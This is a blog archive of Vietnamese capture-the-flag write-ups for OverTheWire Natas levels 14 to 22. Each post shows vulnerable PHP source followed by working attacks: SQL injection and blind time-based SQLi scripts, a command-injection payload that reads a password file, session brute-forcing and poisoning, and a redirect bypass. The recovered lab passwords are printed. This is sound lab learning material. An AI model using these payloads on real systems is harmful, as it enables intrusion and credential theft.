http://natas23.natas.labs.overthewire.org/
Congratulations! You have reached the end… for now.
Rồi, ai về nhà nấy, hẹn gặp lại 
Category Archives: OverTheWire
[OverTheWire] Natas – Level 22
http://natas22.natas.labs.overthewire.org/
only admins can reveal the password…
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
<? session_start(); if(array_key_exists("revelio", $_GET)) { // only admins can reveal the password if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) { header("Location: /"); } } ?> <? if(array_key_exists("revelio", $_GET)) { print "You are an admin. The credentials for the next level are:<br />"; print "<pre>Username: natas23n"; print "Password: <censored></pre>"; } ?> |
Do không hiểu cơ chế của cái hàm header() nên mình rơi vào bế tắc, rất cảm ơn Nam Tóc Xù đã hint mình bài này 
Thực chất vấn đề redirect bằng header() như trên do phía trình duyệt xử lý, chứ không phải là server redirect trực tiếp. Hay nói cách khác, toàn bộ nội dung của file trước khi redirect vẫn được tải về chứ không hề bị ngắt sau khi gọi hàm header(). Ta có thể dễ dàng kiểm tra điều này bằng cách xem tab Network trong Web Developer Tools của trình duyệt.
Để nhận nội dung mà không redirect, ta có thể dùng curl ở chế độ mặc định:
|
1 |
curl --user natas22:chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ http://natas22.natas.labs.overthewire.org/?revelio |
You are an admin. The credentials for the next level are:<br><pre>Username: nata s23 Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE
→ flag = D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE.
[OverTheWire] Natas – Level 21
http://natas21.natas.labs.overthewire.org/
Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org
You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
<? function print_credentials() { /* {{{ */ if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { print "You are an admin. The credentials for the next level are:<br />"; print "<pre>Username: natas22n"; print "Password: <censored></pre>"; } else { print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22."; } } /* }}} */ session_start(); print_credentials(); ?> |
Thua, đố làm được 
Chuyển qua trang kia và chú ý ở:
|
1 2 3 4 5 6 |
// if update was submitted, store it if(array_key_exists("submit", $_REQUEST)) { foreach($_REQUEST as $key => $val) { $_SESSION[$key] = $val; } } |
Xong, còn có thể mong chờ một bài dễ hơn được nữa ở level này không hả trời 
Rõ ràng ta có thể edit cái form submit để trang thứ 2 này lưu $_SESSION với các giá trị tùy ý, trong khi trang 1 lại dùng chung session với trang 2. Thế là 
- Submit trang 2 với một thuộc tính có name:value = admin:1
- Đổi biến PHPSESSID của trang 1 thành PHPSESSID của trang 2.
- Done.
You are an admin. The credentials for the next level are: Username: natas22 Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ
→ flag = chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ.
[OverTheWire] Natas – Level 20
http://natas20.natas.labs.overthewire.org/
You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 |
<? function debug($msg) { /* {{{ */ if(array_key_exists("debug", $_GET)) { print "DEBUG: $msg<br />"; } } /* }}} */ function print_credentials() { /* {{{ */ if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { print "You are an admin. The credentials for the next level are:<br />"; print "<pre>Username: natas21n"; print "Password: <censored></pre>"; } else { print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21."; } } /* }}} */ /* we don't need this */ function myopen($path, $name) { //debug("MYOPEN $path $name"); return true; } /* we don't need this */ function myclose() { //debug("MYCLOSE"); return true; } function myread($sid) { debug("MYREAD $sid"); if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) { debug("Invalid SID"); return ""; } $filename = session_save_path() . "/" . "mysess_" . $sid; if(!file_exists($filename)) { debug("Session file doesn't exist"); return ""; } debug("Reading from ". $filename); $data = file_get_contents($filename); $_SESSION = array(); foreach(explode("n", $data) as $line) { debug("Read [$line]"); $parts = explode(" ", $line, 2); if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1]; } return session_encode(); } function mywrite($sid, $data) { // $data contains the serialized version of $_SESSION // but our encoding is better debug("MYWRITE $sid $data"); // make sure the sid is alnum only!! if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) { debug("Invalid SID"); return; } $filename = session_save_path() . "/" . "mysess_" . $sid; $data = ""; debug("Saving in ". $filename); ksort($_SESSION); foreach($_SESSION as $key => $value) { debug("$key => $value"); $data .= "$key $valuen"; } file_put_contents($filename, $data); chmod($filename, 0600); } /* we don't need this */ function mydestroy($sid) { //debug("MYDESTROY $sid"); return true; } /* we don't need this */ function mygarbage($t) { //debug("MYGARBAGE $t"); return true; } session_set_save_handler( "myopen", "myclose", "myread", "mywrite", "mydestroy", "mygarbage"); session_start(); if(array_key_exists("name", $_REQUEST)) { $_SESSION["name"] = $_REQUEST["name"]; debug("Name set to " . $_REQUEST["name"]); } print_credentials(); $name = ""; if(array_key_exists("name", $_SESSION)) { $name = $_SESSION["name"]; } ?> |
Chúng ta sẽ đi lần lượt theo quy trình xử lý của bài này. Đầu tiên khi ta submit form login:
|
1 2 3 4 |
if(array_key_exists("name", $_REQUEST)) { $_SESSION["name"] = $_REQUEST["name"]; debug("Name set to " . $_REQUEST["name"]); } |
Quá trình set giá trị cho biến $_SESSION được thực hiện qua hàm mywrite(), đáng chú ý ở:
|
1 2 3 4 5 6 |
ksort($_SESSION); foreach($_SESSION as $key => $value) { debug("$key => $value"); $data .= "$key $valuen"; } file_put_contents($filename, $data); |
Tức là giá trị của biến $_SESSION sẽ được lưu vào file thành 1 dòng. Sau đó là quá trình đọc thông tin login của user:
|
1 2 3 4 |
$name = ""; if(array_key_exists("name", $_SESSION)) { $name = $_SESSION["name"]; } |
Thao tác lấy giá trị được đảm nhiệm bởi hàm myread():
|
1 2 3 4 5 6 7 |
$data = file_get_contents($filename); $_SESSION = array(); foreach(explode("n", $data) as $line) { debug("Read [$line]"); $parts = explode(" ", $line, 2); if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1]; } |
Có một điểm đặc biệt là, nếu xét đúng bản chất, biến $_SESSION chỉ có thể chứa một thuộc tính có tên là name, tuy nhiên ở hàm myread(), code vẫn đọc từng dòng từ file để gán giá trị, và nó dẫn đến một cánh cửa vô cùng sáng cho ta lao vào, đó là inject ký tự xuống dòng vào username để tạo ra một thuộc tính 2 trong 1 khi đưa vô file 
|
1 |
curl -u natas20:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF http://natas20.natas.labs.overthewire.org/index.php?debug --cookie "PHPSESSID=njlkb373h5k9q92hdf57ggtl01" --data "name=aaa%0Aadmin 1" |
Kết quả:
You are an admin. The credentials for the next level are:<br><pre>Username: nata s21 Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ
→ flag = IFekPyrQXftziDEsUr3x21sYuahypdgJ.
[OverTheWire] Natas – Level 19
http://natas19.natas.labs.overthewire.org/
This page uses mostly the same code as the previous level, but session IDs are no longer sequential…
Please login with your admin account to retrieve credentials for natas20.
Không có View sourcecode, tuy nhiên dựa vào lời tựa, ta có thể hiểu là nó cũng tương tự bài 18, chỉ khác là giá trị của PHPSESSID sẽ không còn đơn giản nữa.
Thử login với:
username:password = yeuchimse:123456
Kiểm tra cookie:
PHPSESSID=3334332d7965756368696d7365
Khá giống một xâu HEX, decode:
343-yeuchimse
Đơn giản đến không ngờ. Như vậy ta chỉ cần dò giống hệt bài trước, khác mỗi cái cơ chế encode của biến PHPSESSID:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
import urllib, urllib2 def get_url_content(url, cookie, post_data): if (post_data != None): req = urllib2.Request(url, urllib.urlencode(post_data)) else: req = urllib2.Request(url) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0') if (cookie != None): req.add_header('Cookie', cookie) if (post_data != None): req.add_header('Content-type', 'application/x-www-form-urlencoded') source = urllib2.urlopen(req).read() return source passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, "http://natas19.natas.labs.overthewire.org/index.php?debug", 'natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman))) for i in range(640): hex_str = '' for c in str(i): hex_str += str(int(c) + 30) ssid = '%s2d61646d696e' % hex_str cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % ssid source = get_url_content('http://natas19.natas.labs.overthewire.org/index.php?debug', cookie, None) source = source.split('<div id="content">')[1].split('</div>')[0] print 'id: %s' % i, ';', 'ssid: %s' % ssid print source if ('You are an admin' in source): break |
Kết quả là ta tìm được admin tại id = 176
|
1 2 3 4 5 6 7 8 9 |
id: 176 ; ssid: 3137362d61646d696e <p> <b> This page uses mostly the same code as the previous level, but session IDs are no longer sequential... </b> </p> DEBUG: Session start ok<br />You are an admin. The credentials for the next level are:<br /><pre>Username: natas20 Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre> |
→ flag = eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF.
[OverTheWire] Natas – Level 18
http://natas18.natas.labs.overthewire.org/
Please login with your admin account to retrieve credentials for natas19.
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
<? $maxid = 640; // 640 should be enough for everyone function isValidAdminLogin() { /* {{{ */ if($_REQUEST["username"] == "admin") { /* This method of authentication appears to be unsafe and has been disabled for now. */ //return 1; } return 0; } /* }}} */ function isValidID($id) { /* {{{ */ return is_numeric($id); } /* }}} */ function createID($user) { /* {{{ */ global $maxid; return rand(1, $maxid); } /* }}} */ function debug($msg) { /* {{{ */ if(array_key_exists("debug", $_GET)) { print "DEBUG: $msg<br />"; } } /* }}} */ function my_session_start() { /* {{{ */ if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) { if(!session_start()) { debug("Session start failed"); return false; } else { debug("Session start ok"); if(!array_key_exists("admin", $_SESSION)) { debug("Session was old: admin flag set"); $_SESSION["admin"] = 0; // backwards compatible, secure } return true; } } return false; } /* }}} */ function print_credentials() { /* {{{ */ if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { print "You are an admin. The credentials for the next level are:<br />"; print "<pre>Username: natas19n"; print "Password: <censored></pre>"; } else { print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."; } } /* }}} */ $showform = true; if(my_session_start()) { print_credentials(); $showform = false; } else { if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) { session_id(createID($_REQUEST["username"])); session_start(); $_SESSION["admin"] = isValidAdminLogin(); debug("New session started"); $showform = false; print_credentials(); } } if($showform) { ?> |
Bài này sử dụng một custom-session-manager, với giá trị của PHPSESSID nằm ngẫu nhiên trong khoảng từ (1, 640). Tất nhiên admin cũng chỉ có thể nằm trong mớ giá trị đó thôi, và chúng ta sẽ thử dần dần từng giá trị cho đến khi thành công:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
import urllib, urllib2 def get_url_content(url, cookie, post_data): if (post_data != None): req = urllib2.Request(url, urllib.urlencode(post_data)) else: req = urllib2.Request(url) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0') if (cookie != None): req.add_header('Cookie', cookie) if (post_data != None): req.add_header('Content-type', 'application/x-www-form-urlencoded') source = urllib2.urlopen(req).read() return source passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, "http://natas18.natas.labs.overthewire.org/index.php?debug", 'natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP') urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman))) for i in range(640): cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % i source = get_url_content('http://natas18.natas.labs.overthewire.org/index.php?debug', cookie, None) source = source.split('<div id="content">')[1].split('</div>')[0] print '%3d: %s' % (i, source) if ('You are an admin' in source): break |
Kết quả là SESSID của admin = 84:
|
1 2 3 |
84: DEBUG: Session start ok<br />You are an admin. The credentials for the next level are:<br /><pre>Username: natas19 Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs</pre><div id="viewsource"><a href="index-source.html">View sourcecode</a> |
→ flag = 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs.
[OverTheWire] Natas – Level 17
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
<? /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */ if(array_key_exists("username", $_REQUEST)) { $link = mysql_connect('localhost', 'natas17', '<censored>'); mysql_select_db('natas17', $link); $query = "SELECT * from users where username="".$_REQUEST["username"]."""; if(array_key_exists("debug", $_GET)) { echo "Executing query: $query<br />"; } $res = mysql_query($query, $link); if($res) { if(mysql_num_rows($res) > 0) { //echo "This user exists.<br />"; } else { //echo "This user doesn't exist.<br />"; } } else { //echo "Error in query.<br />"; } mysql_close($link); } else { ?> <form action="index.php" method="POST"> Username: <input name="username"><br /> <input type="submit" value="Check existence" /> </form> <? } ?> |
Tất cả các thông báo đều đã bị xoẹt xoẹt, làm sao đây 
Dựa vào cái gì để phân biệt giữa True và False bây giờ 
…
……
………
……
…
Hãy cùng để ý phần Time-based, vì nó chính là thứ chúng ta cần
Ý tưởng là, ta sẽ viết một câu query với đặc tính sau:
- Nếu phép kiểm tra là đúng, sleep 3 giây.
- Nếu phép kiểm tra là sai, không làm gì cả.
Khi ấy, bằng việc so sánh khoảng thời gian thực hiện việc gửi và nhận request, ta có thể biết được phép thử mình gửi lên là đúng hay sai (tất nhiên không xét trường hợp tốc độ mạng quá chậm, dẫn đến không phân biệt nổi giữa sleep 3 giây và sleep 0 giây )
Code minh họa như sau (sẵn kết hợp cả Binary Search thần thánh, nhưng mình không khuyến khích dùng vì… mình không thích cho dùng 
):
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
import urllib, urllib2, time passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, "http://natas17.natas.labs.overthewire.org/", 'natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw') urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman))) flag = '' i = 0 while (True): found = False i += 1 min_ord = 0x30 max_ord = 0x7A while (True): if (min_ord == max_ord): print 'last compare' last_compare = True current_ord = min_ord else: last_compare = False current_ord = (min_ord + max_ord) / 2 print 'current range:', chr(min_ord), chr(current_ord), chr(max_ord) if not last_compare: data = [('username', '" UNION SELECT IF(ascii(substring(password,{0},1)) > {1}, SLEEP(3), 1), "1" FROM users WHERE username="natas18'.format(i, current_ord))] else: data = [('username', '" UNION SELECT IF(ascii(substring(password,{0},1)) = {1}, SLEEP(3), 1), "1" FROM users WHERE username="natas18'.format(i, current_ord))] data = urllib.urlencode(data) start_time = time.time() req = urllib2.Request('http://natas17.natas.labs.overthewire.org/index.php', data) source = urllib2.urlopen(req).read() duration_time = time.time() - start_time print duration_time if (duration_time > 3.0): if last_compare: found = True flag += chr(current_ord) print flag min_ord = current_ord + 1 else: max_ord = current_ord if last_compare: break if (not found): break |
Kết quả:
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
→ flag = xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP.
[OverTheWire] Natas – Level 16
http://natas16.natas.labs.overthewire.org/
For security reasons, we now filter even more on certain characters
Find words containing…
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
<? $key = ""; if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; } if($key != "") { if(preg_match('/[;|&`'"]/',$key)) { print "Input contains an illegal character!"; } else { passthru("grep -i "$key" dictionary.txt"); } } ?> |
Thấy quen quen 
Vì rằng input đã bị escape một số ký tự chủ chốt, ta buộc phải nghĩ cách khác. Cách hay nhất chính là dùng… Google
…
Có những thứ trong cuộc sống mà chúng ta buộc phải chấp nhận một điều, rằng chúng ta chưa có đủ kiến thức để có thể đạt được nó. Chưa đi học, chúng ta không thể hiểu làm sao để giải cái phương trình bậc 2, và thậm chí cũng không biết rằng nó được gọi là phương trình bậc 2, nên không thể tự tìm cách giải quyết. Các bạn hiểu mình đang nói gì không? 
…
Sau khi Google, mình biết được một điều rằng ta có thể lồng các câu lệnh con vào làm tham số của một câu lệnh khác, bằng cách sử dụng $(). Ví dụ:
|
1 |
echo $(echo :sure:) |
output:
:sure:
Trở lại chức năng tìm kiếm của task này, dễ thấy ta có thể inject các câu lệnh theo ý muốn và dựa vào kết quả trả về để xác định password cho task 17. Nó kiểu như:
- Nếu ký tự đầu tiên của task17.pw là ‘a’: Tìm kiếm với keyword = ‘a’.
- Ngược lại: Tìm kiếm với keyword ‘xxx’ (hoặc 1 từ bất kỳ không xuất hiện trong dictionary.txt).
Như thế, nếu có dữ liệu trả về, thì phép thử của chúng ta là đúng, còn ngược lại, phép thử là sai. Tương tự như vậy đối với các ký tự khác.
Tuy nhiên không hiểu sao mình chật vật mãi với đám if…then…fi mà vẫn không xong, nên mình đã Google tiếp và ra một câu lệnh khác, xì tin hơn nhiều:
Xét 2 câu lệnh sau và output của nó:
|
1 |
echo abcdef | grep -E ^a.* |
abcdef
và
|
1 |
echo abcdef | grep -E ^c.* |
(không trả về gì cả)
Tức là, nếu ta nhập input sau vào box search:
|
1 |
$(grep -E ^a.* /etc/natas_webpass/natas17)Americanism |
thì sẽ có 2 trường hợp xảy ra:
- Có dữ liệu liên quan đến từ Americanism trả về: Như vậy $(grep…) trả về <rỗng>, tức là phép thử của chúng ta (task17.pw bắt đầu bằng a) là sai.
- Không có dữ liệu trả về: Như vậy $(grep…) trả về khác <rỗng>, tức là phép thử của chúng ta là đúng, ta tìm được 1 ký tự của pw.
Lặp lại các phép thử như vậy, ta sẽ có đủ 32 ký tự cần tìm.
Code minh họa (không khuyến cáo dùng vì rất chậm):
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
import urllib, urllib2 passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, "http://natas16.natas.labs.overthewire.org", 'natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh') urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman))) def get_url_content(url, cookie, post_data): if (post_data != None): req = urllib2.Request(url, urllib.urlencode(post_data)) else: req = urllib2.Request(url) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0') if (cookie != None): req.add_header('Cookie', cookie) if (post_data != None): req.add_header('Content-type', 'application/x-www-form-urlencoded') source = urllib2.urlopen(req).read() return source flag = '' chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' for i in range(0, 32): for c in chars: print c query = ('$(grep -E ^{0}{1}.* /etc/natas_webpass/natas17)Americanism').format(flag, c) data = [('needle', query), ('submit', 'Search')] source = get_url_content('http://natas16.natas.labs.overthewire.org/?%s' % urllib.urlencode(data), None, None) if 'Americanism' not in source: flag += c print 'Current flag:', flag break |
Kết quả:
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
→ flag = 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw.
[OverTheWire] Natas – Level 15
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
<? /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */ if(array_key_exists("username", $_REQUEST)) { $link = mysql_connect('localhost', 'natas15', '<censored>'); mysql_select_db('natas15', $link); $query = "SELECT * from users where username="".$_REQUEST["username"]."""; if(array_key_exists("debug", $_GET)) { echo "Executing query: $query<br />"; } $res = mysql_query($query, $link); if($res) { if(mysql_num_rows($res) > 0) { echo "This user exists.<br />"; } else { echo "This user doesn't exist.<br />"; } } else { echo "Error in query.<br />"; } mysql_close($link); } else { ?> |
Có một điều khác biệt so với task trước, đó là không hề có câu lệnh in ra password cho level tiếp theo. Vậy phải làm sao?
Có một ý tưởng (dự đoán), đó là liệu trong database có username và password cho level 16?
Thử nhập username = natas16:
This user exists.
Ok, vậy gần như chắc chắn password của user này sẽ là thứ ta cần tìm.
Có nhiều cách để dò pw, mà thường cách phổ thông nhất là so sánh từng ký tự của pw (MYSQL cung cấp cho ta hàm ascii() và substring() để làm việc này) với các ký tự hợp lệ (trong trường hợp này là a..z, A..Z, 0..9), tức mất tối đa 26 + 26 + 10 = 62 lần thử để tìm ra một ký tự. Độ dài pw là 32, nên số phép thử là khá lớn.
Nếu đi theo tư tưởng của Binary Search, ta chỉ mất khoảng 7 (hay 8 gì đó =.=) lần thử cho 1 ký tự.
Code minh họa như sau (bạn có thể không cần hiểu, vì mình đọc lại cũng không hiểu lắm , nhưng tư tưởng của Binary Search thì thống nhất trên Google rồi, ai cũng có thể tự cài đặt theo ý thích):
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
import urllib, urllib2 passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, "http://natas15.natas.labs.overthewire.org/index.php", 'natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J') urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman))) flag = '' i = 0 while (True): found = False i += 1 min_ord = 0x30 # '0' max_ord = 0x7A # 'z' while (True): if (min_ord == max_ord): last_compare = True current_ord = min_ord else: last_compare = False current_ord = (min_ord + max_ord) / 2 if not last_compare: data = [('username', 'natas16" AND ascii(substring(password,{0},1)) > {1}#'.format(i, current_ord))] else: data = [('username', 'natas16" AND ascii(substring(password,{0},1)) = {1}#'.format(i, current_ord))] data = urllib.urlencode(data) req = urllib2.Request('http://natas15.natas.labs.overthewire.org/index.php', data) source = urllib2.urlopen(req).read() if ('exists' in source): if last_compare: found = True flag += chr(current_ord) print flag min_ord = current_ord + 1 else: max_ord = current_ord if last_compare: break if (not found): break |
Kết quả:
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
→ flag = WaIHEacj63wnNIBROHeqi3p9t0m5nhmh.
[OverTheWire] Natas – Level 14
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
<? if(array_key_exists("username", $_REQUEST)) { $link = mysql_connect('localhost', 'natas14', '<censored>'); mysql_select_db('natas14', $link); $query = "SELECT * from users where username="".$_REQUEST["username"]."" and password="".$_REQUEST["password"]."""; if(array_key_exists("debug", $_GET)) { echo "Executing query: $query<br />"; } if(mysql_num_rows(mysql_query($query, $link)) > 0) { echo "Successful login! The password for natas15 is <censored><br />"; } else { echo "Access denied!<br />"; } mysql_close($link); } else { ?> |
Ta thấy ngay được là username và password đều không bị escape. Inject với câu lệnh được dạy trong sách giáo khoa:
username = " OR 1=1# password = <gì cũng được>
Kết quả:
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
→ flag = AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J.